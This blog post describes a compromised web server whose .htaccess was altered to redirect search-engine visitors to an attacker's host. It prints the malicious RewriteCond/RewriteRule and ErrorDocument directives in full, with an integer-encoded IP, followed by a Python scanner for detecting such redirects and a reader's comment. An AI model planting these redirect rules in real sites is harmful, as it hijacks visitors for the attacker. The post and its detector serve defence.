Exploit Search Engine Attack – bitrid

Recently one of my friends had his server attacked by a hacker, who was able to modify the .htaccess file.
They had added several redirect conditions and ErrorDocument directives.

He was really worried because AVG Antivirus was reporting the virus “Exploit Search Engine Attack – ~bitrid/” and was blocking access.
I really loved AVG Antivirus, and credit goes to their forum for a hint about some kind of redirect script.

The .htaccess had the following code, which was causing this issue.
If you come across any such issue, it is probably best to look into the .htaccess files.
You might also check with the hosting company; they may be able to review the system security.

RewriteEngine On

RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*rambler.* [OR]
RewriteCond %{HTTP_REFERER} .*mail.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http: // 1502998896/~bitrid/ [R=301,L]

ErrorDocument 401 http: //1502998896/~bitrid/
ErrorDocument 403 http: //1502998896/~bitrid/
ErrorDocument 404 http: //1502998896/~bitrid/
ErrorDocument 500 http: //1502998896/~bitrid/

I still wonder how the hacker could modify the .htaccess, and they never touched any other files!
I just hope no one else gets affected this way 😉
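
A defensive check for the pattern shown above, as an added example that is not part of the original post: it scans .htaccess text for RewriteRule and ErrorDocument targets that point off-site, notes whether a redirect is gated on HTTP_REFERER, and decodes an all-digit host (the 32-bit integer form of an IPv4 address) to dotted-quad. The function names, the `own_hosts` parameter and the sample rules are constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# A RewriteCond that tests the Referer header (how search visitors are singled out).
REFERER_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s", re.I)
# RewriteRule / ErrorDocument with an absolute URL target (tolerates "http: // host").
REDIRECT = re.compile(
    r"^\s*(RewriteRule\s+\S+|ErrorDocument\s+\d{3})\s+(https?:\s*//\s*\S+)", re.I)

# Constructed sample: 3221225985 is 192.0.2.1 (documentation range) as an integer.
SAMPLE = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*
RewriteRule ^(.*)$ http://3221225985/~placeholder/ [R=301,L]
ErrorDocument 404 http://3221225985/~placeholder/
ErrorDocument 403 /errors/403.html
RewriteRule ^old$ http://www.example.com/new [R=301,L]
"""

def describe_host(url):
    """Return the target host; decode an all-digit host to dotted-quad form."""
    host = urlsplit(re.sub(r"\s+", "", url)).hostname or ""
    if host.isdigit() and int(host) < 2**32:
        return f"{host} (= {ipaddress.ip_address(int(host))})"
    return host

def scan_htaccess(text, own_hosts=()):
    """Return (line, directive, host, referer_gated) for each off-site target."""
    findings, referer_gated = [], False
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        if REFERER_COND.match(line):
            referer_gated = True   # conditions apply to the next RewriteRule
            continue
        m = REDIRECT.match(line)
        if m:
            directive = m.group(1).split()[0]
            host = describe_host(m.group(2))
            if host.split(" ")[0].lower() not in own_hosts:
                gated = referer_gated and directive.lower() == "rewriterule"
                findings.append((lineno, directive, host, gated))
        if line.lstrip().lower().startswith("rewriterule"):
            referer_gated = False  # the RewriteCond stack is consumed by the rule
    return findings

if __name__ == "__main__":
    for finding in scan_htaccess(SAMPLE, own_hosts={"www.example.com"}):
        print(finding)
```

The comment below reports the modified file sitting in the home directory above the web root, so check every .htaccess on the path, not only the one in the public directory.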

One thought on “Exploit Search Engine Attack – bitrid”

  1. got hit by the same thing/evil-doer, and had a hard time locating the issue because no files in the pub dir had been altered. finally discovered the .htaccess in the home dir ABOVE the pub_html had been hacked… exact duplicate of your example… found it in the ftp logs. not nice… still not sure how they gained access to ftp site.
